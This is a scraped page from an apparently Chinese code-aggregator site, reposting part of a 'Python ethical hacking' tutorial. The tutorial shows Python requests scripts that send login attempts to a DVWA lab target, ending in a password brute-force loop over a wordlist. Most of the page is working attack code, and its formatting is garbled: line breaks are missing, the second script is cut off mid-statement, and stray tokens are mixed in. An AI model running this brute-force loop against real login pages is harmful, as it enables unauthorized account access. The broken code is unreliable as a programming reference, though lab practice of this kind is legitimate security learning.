Guessing Login information on Login Pages
Our target website: http://10.0.0.45/dvwa/login.PHP
@H_403_13@
#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "dfdfddfd","password": "1234","Login": "submit"}response = requests.post(target_url,data = data_dict)print(response.content.decode())
Execute the Python Script.
@H_403_13@
#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "admin","password": "password",data = data_dict)print(response.content.decode())
@H_403_13@
#!/usr/bin/env pythonimport requeststarget_url = "http://10.0.0.45/dvwa/login.PHP"data_dict = {"username": "admin","password": "","Login": "submit"}with open("password.List","r") as wordList_file: for line in wordList_file: word = line.strip() data_dict["password"] = word response = requests.post(target_url,data=data_dict) if "Login Failed" not in response.content.decode(): print("[+] Got the password --> " + word) exit()print("[+] Reached end of line.")
@H_403_13@
总结以上是内存溢出为你收集整理的Python Ethical Hacking - WEB PENETRATION TESTING(5)全部内容,希望文章能够帮你解决Python Ethical Hacking - WEB PENETRATION TESTING(5)所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)